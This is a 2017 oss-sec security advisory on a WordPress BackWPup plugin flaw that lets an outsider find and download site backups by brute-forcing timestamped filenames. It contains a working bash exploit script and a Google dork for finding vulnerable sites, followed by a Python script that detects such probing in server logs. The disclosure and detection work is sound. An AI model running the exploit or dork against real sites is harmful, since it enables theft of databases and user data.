oss-sec mailing list archives
Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 27 Sep 2017 12:13:47 -0400
Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-08
CVE-ID: [CVE-2017-2551]
Download Site: https://wordpress.org/plugins/backwpup
Vendor: Inpsyde
Vendor Notified: 2017-09-08, fixed v3.4.2
Vendor Contact: plugins () wordpress org
Advisory: http://www.vapidlabs.com/advisory.php?v=201

Description:
"The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more."

Vulnerability:
There is a weakness in the way backwpup creates and stores the backup files it generates. It creates a random string to obscure the location, but it uses that same string to create the storage directory under wp-content/uploads/, which in most installations of WordPress allows file listings. Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file, as its structure is just a date and time stamp. It would take a maximum of 86400 tries to guess whether a backup is available for that day.
Filename format:
backwpup_ RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s

Default settings are:
%d = Two digit day of the month, with leading zeros
%m = Day of the month, with leading zeros
%Y = Four digit representation for the year
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second

https://wordpress.org/plugins/backwpup

Exploit Code:

#!/bin/bash
#Exploit for Wordpress Plugin BackWPup v3.4.1
#Download https://wordpress.org/plugins/backwpup
#CWE-552: Files or Directories Accessible to External Parties
#CVE-ID: CVE-2017-2551
#Google Dork: inurl:wp-content/uploads/backwpup


#Add banner about vulnerability

KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`

#Add error checking here
echo "[+] Getting Unique Key $KEY"
DIR="backwpup-$KEY-backups"
echo "[+] Checking directory $DIR"
WPATH="$DIR/backwpup_$KEY"
echo "[+] Creating Path: $WPATH"
#use date command here for the default date of current day
MONTH=09
DAY=07
YEAR=2017
Z=0

echo "[+] Scanning website for available backups:"
for y in `seq -w 0 23`; do
  for x in `seq -w 0 59`; do
    Y=`echo "scale=2;($Z/86000)*100"|bc`;
    echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%"
    for z in `seq -w 0 59`; do
      Z=$(( $Z + 1 ));
      CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
      RESULT=`curl -s --head $CWPATH|grep 200`;
      if [ -n "$RESULT" ]; then
        echo ""
        echo "[+] Location $CWPATH Found";
        echo "[+] Received $RESULT";
        echo "Downloading......";
        # wget $CWPATH
        exit;
      fi;
    done
  done
done
echo "Completed."
Screen Shots:

Notes:
Google Dork: inurl:wp-content/uploads/backwpup
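As an added example that is not part of the advisory, the following Python script shows what a scan of this kind leaves in a web server access log and how a site operator can flag it: a burst of 404s from one client on BackWPup archive paths that differ only in the timestamp, or a 200 on such a path (an archive was actually served). The combined log format, the client addresses and the key value are constructed for the example.

```python
import re
from collections import defaultdict

# Combined log format as written by Apache/nginx; sample lines are constructed below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)
# BackWPup archive path: the random key appears in the directory name and again in
# the file name, followed by the job number and the default %Y-%m-%d_%H-%i-%s stamp.
BACKUP_RE = re.compile(
    r'^/wp-content/uploads/backwpup-(?P<key>\w+)-backups/'
    r'backwpup_(?P=key)\d+_\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}\.\w+$'
)

def find_backup_probing(lines, threshold=20):
    """Return {ip: (miss_count, hit_paths)} for clients probing BackWPup archives.

    A client is reported when it has at least `threshold` 404s on archive paths
    (timestamp guessing) or any 200 on such a path (an archive was served).
    """
    misses, hits = defaultdict(int), defaultdict(list)
    for line in lines:
        rec = LOG_RE.match(line)
        if not rec or not BACKUP_RE.match(rec['path']):
            continue
        if rec['status'] == '404':
            misses[rec['ip']] += 1
        elif rec['status'] == '200':
            hits[rec['ip']].append(rec['path'])
    return {ip: (misses[ip], hits[ip]) for ip in set(misses) | set(hits)
            if misses[ip] >= threshold or hits[ip]}

def sample_log():
    """Constructed sample: one client guessing the seconds field, one normal visitor."""
    key = 'k3y9f3c'  # placeholder key, not from any real installation
    base = f'/wp-content/uploads/backwpup-{key}-backups/backwpup_{key}01_2017-09-07_00-00-'
    lines = [f'203.0.113.5 - - [07/Sep/2017:10:00:{s:02d} -0400] "HEAD {base}{s:02d}.zip HTTP/1.1" 404 - "-" "curl/7.54.0"'
             for s in range(25)]
    lines.append(f'203.0.113.5 - - [07/Sep/2017:10:00:25 -0400] "GET {base}25.zip HTTP/1.1" 200 10240 "-" "curl/7.54.0"')
    lines.append('198.51.100.7 - - [07/Sep/2017:10:01:00 -0400] "GET /wp-content/uploads/2017/09/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')
    return lines

if __name__ == '__main__':
    for ip, (miss_count, hit_paths) in find_backup_probing(sample_log()).items():
        print(f'{ip}: {miss_count} guesses on backup paths, {len(hit_paths)} archive(s) served')
```

The same check run over real logs also tells an operator whether the directory listing was used: a request for /wp-content/uploads/ or the backwpup-*-backups/ directory itself from the flagged client immediately before the burst is the listing step the advisory describes.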